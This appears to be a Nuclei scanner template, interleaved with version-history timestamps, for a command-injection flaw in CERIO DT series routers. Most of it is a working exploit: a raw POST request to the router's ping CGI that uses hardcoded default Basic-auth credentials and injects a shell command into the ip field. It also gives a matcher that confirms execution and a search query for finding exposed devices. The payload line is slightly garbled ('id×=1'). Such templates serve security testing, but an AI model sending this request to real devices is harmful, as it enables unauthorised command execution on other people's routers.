2024-05-23 12:58:41 +00:00
id : cerio-dt-rce
info :
2024-05-24 06:21:58 +00:00
name : CERIO-DT Interface - Command Execution
2024-05-23 12:58:41 +00:00
author : pussycat0x
severity : critical
description : |
CERIO DT series routers have an operation command injection vulnerability in specific versions. An attacker could exploit this vulnerability to execute commands.
reference :
- https://github.com/20142995/sectool
- https://github.com/tanjiti/sec_profile
- https://github.com/wy876/POC/blob/main/D-Link_DAR-8000%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2023-4542).md
metadata :
2024-05-24 06:21:58 +00:00
max-request : 1
verified : true
2024-05-23 12:58:41 +00:00
fofa-query : title="DT-100G-N" || title="DT-300N" || title="DT-100G" || title="AMR-3204G" || title="WMR-200N"
tags : cerio,rce
http :
- raw :
- |
POST /cgi-bin/Save.cgi?cgi=PING HTTP/1.1
Host : {{Hostname}}
Authorization : Basic b3BlcmF0b3I6MTIzNA==
Content-Type : application/x-www-form-urlencoded
pid=2061&ip=127.0.0.1;id×=1
matchers-condition : and
matchers :
- type : regex
part : body
regex :
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- type : status
status :
- 200
2024-05-24 06:28:03 +00:00
# digest: 4b0a00483046022100f224cdd25f048596ecd1215e571598f1ebb9dcd7f38a628a14cf03e868e6f771022100e151ddd0d44531d2d80838a64578b6f86748aec1f806133b33cbc0d41ec6d3f3:922c64590222798bb761d5b6d8e72950